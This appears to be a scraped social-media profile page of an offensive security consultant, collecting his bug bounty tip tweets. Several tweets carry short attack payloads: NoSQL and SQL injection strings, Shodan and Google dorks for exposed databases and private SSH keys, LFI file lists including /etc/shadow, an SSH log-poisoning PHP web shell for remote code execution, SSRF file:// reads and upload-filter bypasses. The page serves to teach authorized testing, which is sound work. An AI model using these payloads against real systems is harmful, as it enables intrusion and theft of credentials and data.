Tushar Verma 🇮🇳
@e11i0t_4lders0n
Followers
20,562
Following
826
Media
409
Statuses
3,275
Offensive Security Consultant at NST-Cyber | @SynackRedTeam Member | Public Speaker | Open for Freelance Engagements
Mumbai, India
Joined March 2020
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
$ZRO
• 2892638 Tweets
#GranHermano
• 520891 Tweets
Furia
• 517287 Tweets
Willie Mays
• 192752 Tweets
#HappyBirthdayRahulGandhi
• 77825 Tweets
PlayStation®5
• 45009 Tweets
シグウィン
• 41398 Tweets
ドジャース
• 37426 Tweets
Darío
• 35120 Tweets
Dutton
• 32769 Tweets
さきたま杯
• 31736 Tweets
नालंदा विश्वविद्यालय
• 30457 Tweets
ホタルちゃん
• 25333 Tweets
श्री राहुल गांधी
• 21453 Tweets
帰還開拓者
• 18784 Tweets
KerjaFOKUS UntukRAKYAT
• 14527 Tweets
#NalandaUniversity
• 13967 Tweets
POOHPAVEL WITH LEADERS
• 12215 Tweets
レモンポップ
• 11820 Tweets
Felipe VI
• 11243 Tweets
パフォーマンスフォト
• 10102 Tweets
How to start Bug Bounty Hunting
Follow this thread 🧵
Note:I m assuming that you have cleared your basics
#bugbounty
#bugbountytip
#bugbountytips
61
385
1K
Stop trying every tools you get on internet, stick to one tool and try to use maximum of it to get results
Just for an example: Ffuf
Refer these resources:
#bugbounty
#bugbountytip
#bugbountytips
50
215
785
How I Escalated a Time-Based SQL Injection to RCE
15
227
760
Labs for Web application Pentesting Practice
SQLi-
Oauth 2.0-
GraphQL-
JWT Authentication-
SAML Authentication-
XSS-
#bugbounty
4
380
744
Checklist and Cheatsheets
WAPT-
Authenication-
Oauth Misconfiguration-
File Upload-
IDOR-
XSS-
#bugbountytips
10
390
707
57
246
584
Bug Bounty Free Learning Materials
Follow this thread if you can’t google and learn things😅
#bugbounty
#bugbountytip
#bugbountytips
47
272
572
Shodan Dorks for Finding Sensitive Data
"MongoDB Server Information" port:27017 -authentication
"Set-Cookie: mongo-express=" "200 OK"
mysql port:"3306"
port:"9200" all:"elastic indices"
port:5432 PostgreSQL
proftpd port:21
#bugbounty
#bugbountytip
#bugbountytips
31
252
552
66
257
553
Thick Client Penetration Testing
Tools
1-Interception proxies:
- Burp Suite
- Fiddler
- Echo Mirage
- Charles
- Mallory
- JavaSnoop
2-Traffic Analysis:
- TCPDump
- Wireshark
3-Static Tools
-CFF Explorer
-PEid
-Detect It Easy (DIE)
8
198
552
Google Dorks for Bug Bounty
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" ""
#bugbountytips
34
217
541
Advance Web Application Penetration Testing Checklist
Notion Link:
#bugbounty
#bugbountytip
#bugbountytips
5
187
542
This post is for all beginners who are stuck after solving
@PortSwigger
Academy. So i have just created a list (
@hackthebox_eu
)which u can refer & follow after you are done with your basics from
@PortSwigger
&
@PentesterLab
.
9
160
489
35
198
465
Payloads for NoSQL Injection
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
#bugbounty
#bugbountytips
2
177
462
7
223
460
If an LFI vulnerability exists, look for these files:
1-Linux system and user files:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/home/user/
/home/user/.ssh
/home/user/bash_history
#bugbounty
#bugbountytip
#bugbountytips
7
176
444
36
173
434
Bug Bounty Free Training
Total Session: 0
Self Learning
Ethical Hacking basics:
Burpsuite:
Bugcrowd VRT - Google
@Bugcrowd
VRT Vulnerabilities
Checklist:
18
175
428
API Testing Resources
1
186
420
Web Application Pentest Checklist by "Chintan Gurjar"
@ADITYASHENDE17
@udit_thakkur
@manas_hunter
@sillydadddy
@udit_thakkur
@InfoSecComm
13
198
416
LFI to RCE via SSH Log File Poisoning (PHP)
url: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log
payload: ssh <?php system($_GET['c']);?>@<target_ip>
execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id
#bugbounty
2
161
406
Jenkins Pentesting
2
164
398
Bug Bounty Mindmap by
@HackerGautam
@ADITYASHENDE17
@fuxksniper
@sillydadddy
@stokfredrik
@udit_thakkur
@impratikdabhi
@manas_hunter
@InfoSecComm
3
157
377
Most of the penetration testers need a tool to generate reports and deliver an understandable document to their clients!
Try this open-source tool
3
144
376
When looking for IDORs and have 401/403 errors, some bypasses :
- Wrap ID with an array {“id”:111} --> {“id”:[111]}
- JSON wrap {“id”:111} --> {“id”:{“id”:111}}
- Send ID twice URL?id=<LEGIT>&id=<VICTIM>
- Send wildcard {""user_id"":""*""}
5
114
351
Web Security Topics for selfstudy:
@ADITYASHENDE17
@impratikdabhi
@manas_hunter
@InfoSecComm
@udit_thakkur
"Credit Goes to Owner"
12
143
350
Drop ur favourite tools you use during bug bounty hunting🙂
45
91
346
AWS Security Testing Checklist
=Identity and Access Management
1-Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
2-Ensure credentials unused for 90 days or greater are disabled
10
143
341
Azure Pentesting Tools
1-Enumeration
o365creeper
CloudBrute
cloud_enum
Azucar
CrowdStrike Reporting Tool for Azure (CRT)
ScoutSuite
BlobHunter
Grayhat Warfare
3
133
337
File Upload Tricks
-Use double extensions: .jpg.php
-Use reverse double extension: .php.jpg
-Mix uppercase and lowercase: .pHp, .pHP5, .PhAr
-Null byte: .php%00.png, .php\x00.png
-Multiple dots: file.php......
-Whitespace characters: file.php%20
#BugBounty
#bugbountytips
4
140
337
Facing problem in making your own recon methodology
Follow this thread 🧵
#bugbounty
#bugbountytip
#bugbountytips
51
174
336
Just found 2 IDORs with the help of authorize
Tip-Don’t test IDOR manually,try to semi-automate using authorize
Check these blogs for better understanding
#bugbounty
#bugbountytips
2
163
328
Android Security materials
3
141
327
Resources for Cloud Security(AWS,GCP,Azure)
Plz share😊
16
96
319
I am planning to mentor(guide) 2 Students free of cost who are new into Penetration Testing/Bug Bounty
Comment these things in this post:
1-Why you need this?
2-Your career plan?
3-Your Public Profile(BugBounty/HTB/THM)
You can retweet this for maximum reach
#bugbounty
116
100
316
Checklist
Android Application Penetration Testing Checklist by
@harshbothra_
Web Application Penetration Testing Checklist
Infrastructure Pentesting Checklist by
@purab_parihar
4
130
300
4 SSRF this month
Its fun hunting for SSRF
Few Resources which you can refer:
#bugbountytips
3
168
301
Mobile Application Penetration Testing Cheat Sheet
3
129
290
Exploiting GraphQL Batching Attacks Using Turbo Intruder
2
116
287
Learn Broken Access Control for Bug Bounty with these resources
#bugbounty
#bugbountytip
#bugbountytips
8
179
280
1
137
277
Slides of my talk on "Hacking OAuth Application"
2
85
278
SSRF exploitation via URL Scheme
1-File:Allows an attacker to fetch the content of a file on the server
file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd
#bugbounty
#bugbountytips
#bugbountytip
3
117
278
Awesome list of techniques to achieve Remote Code Execution on various apps
7
114
273
0
109
268
Linux Privilege Escalation: Quick and Dirty
1
110
265
Trick for finding sensitive Information
@ADITYASHENDE17
@manas_hunter
@udit_thakkur
Credit-
@RazzSecurity
5
93
262
New Updates on my web application penetration checklist
1-Wordpress Common Vulns
2-403 bypass techniques
3-Burp Suite Extensions
Link:
#BugBounty
#bugbountytip
#bugbountytips
2
90
266
Step-by-step guide to implementing a DevSecOps program for any size organisation
4
82
257
AWS Testing Checklist
@ADITYASHENDE17
@InfoSecComm
@sillydadddy
@manas_hunter
@impratikdabhi
@udit_thakkur
@codingo_
@stokfredrik
1
124
257
From a 404 Page to RCE
0
68
250
With the help of google dorks, we can easily find bypasses
1-Normal search:
<wafname> waf bypass
2-Searching for specific version exploits: "<wafname> <version>" (bypass|exploit)
3-For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit)
3
114
253
Finding The Real Origin IPs Hiding Behind CloudFlare or Tor
2
93
244
As a beginner,i faced lot's of difficulties in finding one single bug,i searched everywhere abt any checklist but none were available.After 3months of hardwork & constant support of
@impratikdabhi
@ADITYASHENDE17
@udit_thakkur
@manas_hunter
finally made my Bug hunting checklist
12
70
240
One of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results.
For example: if the GET parameter ?username=Peter returns the same content as ?username=Peter' or '1'='1 then, you found a SQL injection.
#bugbountytips
2
83
240
0
102
236
Different tricks to turn your LFI into RCE
1-Using file upload forms/functions
2-Using the PHP wrapper expect://command
3-Using the PHP wrapper php://file
4-Using the PHP wrapper php://filter
5-Using PHP input:// stream
6-Using data://text/plain;base64,command
#bugbountytips
1
94
227
File Upload Restriction Bypass Checklist
1-Try various file extensions-Try different versions of the file extensions, for example php3, .php4, .php5, phtml for PHP scripts, asp,aspx
#bugbounty
#bugbountytip
#bugbountytips
5
100
226
A curated collection of awesome resources, tools, and other shiny things for cybersecurity blue teams
1
81
222
How to find an RCE in a Bug Bounty Program
There are two common situations where a Remote Code Execution can occur:
#bugbounty
#bugbountytips
#bugbountytip
2
71
216
SQL Injection Cheatsheet
1
75
219
IDOR Entry Points
1-Profile URL’s or ID’s
2-Password reset functions (great for privilege escalation)
3-Numeric parameters
4-Predictable parameters
#bugbounty
#bugbountytip
#bugbountytips
10
73
212
Thick Client Penetration Testing Resources
3
133
213
SQL Injection for Noobs
@ADITYASHENDE17
@CristiVlad25
@KathanP19
@theXSSrat
@_codeh4ck3r
@impratikdabhi
@remonsec
2
109
213
17
67
213
GraphQL Vulnerabilities
1-Parsing Vulnerabilities
2-Normalization Issues
3-Operation Validation Errors
4-Denial of Service Attacks
5-GraphQL SQL Injection Vulnerability
6-Authentication Vulnerabilities
7-GraphQL Authorization traversal attack
#bugbounty
#bugbountytips
1
89
210
iOS Pentesting Resources
Blogs:-
1
90
204
4
95
203
Docker Security Cheat Sheet
1-Keep Host and Docker up to date
2-Set a user
3-Limit capabilities (Grant only specific capabilities, needed by a container)
4-Add –no-new-privileges flag
5-Disable inter-container communication (--icc=false)
3
77
206
Windows DLL Injection Basics
DLL injection is the process of inserting code into a running process. The code we usually insert is in the form of a dynamic link library(DLL)
DLL injection into four steps:
6
59
207
$7000 Bounty on a Single Web Application
4
34
205
How I was able to bypass OTP code requirement in Razer [The story of a critical bug]
2
51
200
If you find SQL Injection in any program or product always check for the current database user role.If the user is a root and has the file write permission,we can upload a malicious file via SQL statement.
#bugbountytip
#bugbountytips
10
39
202
Collection of Facebook Bug Bounty Writeups
4
66
206
WHERE TO LOOK FOR XXE?
1-Functionality that parses SVG files
2-Functionality that parses sitemap.xml files
3-SAML Authentication
4-HTML parsing
5-SOAP APIs
6-XML APIs
#bugbounty
#bugbountytip
#bugbountytips
2
86
204
0
117
198
4
82
201
Cloud Security Threats
1-Insecure APIs
2-Outdated software
3-Misconfigurations on the cloud
4-Stolen credentials
5-Access privileges
0
47
196
DevSecOps Automation
1-Static Application Security Testing (SAST)
-SonarQube
-CxSAST (Checkmarx)
-Fortify
-Veracode Static Analysis (Veracode)
4
59
198
Where do IDORs commonly found?
-REST APIs
-GET parameters
-POST request bodies
-GraphQL endpoints
-PUT parameters
-IDs in the request header
-IDs in the cookies
4
63
192
Security Testing Scripts for JWT
2
61
193
AWS S3 Bucket Misconfiguration
1-Bucket takeover-If an application is using a domain-linked S3 bucket that has been deleted by developers and CNAME records from Amazone Route 53 are still pending deletion,you can claim this unclaimed S3 bucket name by using an other AWS account
1
72
186
I have started preparing the beginner’s content for getting started in bug bounty. It will take time for me to collect all the resources at one place. So I thought to upload the work and keep updating on every weekend during my free time to help every beginner
Link: 👇🏻
5
41
188